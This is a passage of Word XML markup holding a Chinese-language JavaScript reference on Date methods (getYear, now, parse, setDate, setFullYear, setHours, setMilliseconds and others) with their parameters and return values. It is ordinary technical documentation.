      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>以全球时间表示的</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的秒数值。返回值是</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>59</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个整数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="622" w:name="Date_getYear__"/>
      <w:r>
        <w:t>Date.getYear()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="622"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的年份值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date.getYear()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>给定</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的年份值减去</w:t>
      </w:r>
      <w:r>
        <w:t>1900</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getYear()</w:t>
      </w:r>
      <w:r>
        <w:t>返回给定</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的年份值减去</w:t>
      </w:r>
      <w:r>
        <w:t>1900</w:t>
      </w:r>
      <w:r>
        <w:t>。自</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>版开始，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>已不再要求实现这个方法；可使用</w:t>
      </w:r>
      <w:r>
        <w:t>getFullYear()</w:t>
      </w:r>
      <w:r>
        <w:t>来代替它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="623" w:name="Date_now__"/>
      <w:r>
        <w:t>Date.now()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="623"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>以毫秒的形式返回当前时间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Date.now()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:t>1970-01-01</w:t>
      </w:r>
      <w:r>
        <w:t>午</w:t>
      </w:r>
      <w:r>
        <w:t>夜（</w:t>
      </w:r>
      <w:r>
        <w:t>GMT</w:t>
      </w:r>
      <w:r>
        <w:t>）到现在的时间，以毫秒表示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>之前，可以像下面这样实现这个方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Date.now=function(){return(new Date()).getTime();}</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Date</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Date.getTime()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="624" w:name="Date_parse__"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Date.parse()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="624"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>解析一个日期</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>时间字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date.parse(date)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个包含待解析的日期和时间的字符串。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从</w:t>
      </w:r>
      <w:r>
        <w:t>1970-01-01</w:t>
      </w:r>
      <w:r>
        <w:t>午夜（</w:t>
      </w:r>
      <w:r>
        <w:t>GMT</w:t>
      </w:r>
      <w:r>
        <w:t>）到给定日期之间的毫秒数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date.parse()</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>的一个静态方法。它返回从纪元开始到给定字符串参数所指定的日期之间的毫秒数。返回值可以直接用于创建一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象，或用于通过</w:t>
      </w:r>
      <w:r>
        <w:t>Date.setTime()</w:t>
      </w:r>
      <w:r>
        <w:t>设置一个已存在的</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的日期。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>要求这个方法可以解析由</w:t>
      </w:r>
      <w:r>
        <w:t>Date.toISOString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回的字符串。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>以及之前的版本中，还要求这个方法能解析由</w:t>
      </w:r>
      <w:r>
        <w:t>toUTCString()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回的依赖于具体实现环境的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Date.se</w:t>
      </w:r>
      <w:r>
        <w:t>tTime()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Date.toISOString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Date.toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="625" w:name="Date_setDate__"/>
      <w:r>
        <w:t>Date.setDate()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="625"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>设置一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的一月中的日期值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>date.setDate(day_of_month)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>day_of_month</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>31</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个整数，将用做</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的对应月中的日期值（本地时间）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调整后的日期的毫秒表示形式。在有</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准之前，这个方法什么也不返回。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="626" w:name="Date_setFullYear__"/>
      <w:r>
        <w:t>Date.setFullYear()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="626"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>设置一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>的年份值，以及可选的月份值和日期值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date.setFullYear(year)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date.setFullYear(year,month)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date.setFullYear(year,month,day)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>year</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>d at e</w:t>
      </w:r>
      <w:r>
        <w:t>中待设置的年份值，本地时间形式。这个参数应该是一个包含世纪的整数，如</w:t>
      </w:r>
      <w:r>
        <w:t>1999</w:t>
      </w:r>
      <w:r>
        <w:t>；它不能是缩写，如</w:t>
      </w:r>
      <w:r>
        <w:t>99</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>month</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个可选整数，将用做</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的月份值（本地时间）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>day</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>31</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个可选整数，将用做</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的对应月中的日期值（本地时间）。</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调整后的日期的内部毫秒表示形式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="627" w:name="Date_setHours__"/>
      <w:r>
        <w:t>Date.setHours()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="627"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>设置一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>的小时、分钟、秒以及毫秒值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date.setHours(hours)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date.setHours(hours,minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date.setHours(hours,minutes,seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date.setHours(hours,minutes,seconds,millis)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hours</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>（午夜）～</w:t>
      </w:r>
      <w:r>
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:t>（晚上</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>点）之间的一个整数，将用做</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的新的小时值（本地时间）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>minutes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>59</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个可选整数，将用做</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的新</w:t>
      </w:r>
      <w:r>
        <w:t>的分钟值（本地时间）。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准化之前，不支持这个参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>seconds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>59</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个可选整数，将用做</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的新的秒钟值（本地时间）。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准化之前，不支持这个参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>millis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>999</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个可选整数，将用做</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的新的毫秒值（本地时间）。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准化之前，不支持这个参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调整过后的时间的毫秒表示形式。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准化之前，这个方法什么也不返回。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="628" w:name="Date_setMilliseconds__"/>
      <w:r>
        <w:t>Date.setMilliseconds()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="628"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>设置一个日期的毫秒值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date.setMilliseconds(millis)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t>millis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将用于</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>以本地时间表示的毫秒值。这个参数应该是</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>999</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个整数。</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调整后的日期的毫秒表示形式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="629" w:name="Date_setMinutes__"/>
      <w:r>
        <w:t>Date.setMinutes()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="629"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>设置一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>的分钟、秒钟以及毫秒值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date.setMinutes(minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date.setMinutes(minutes,seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
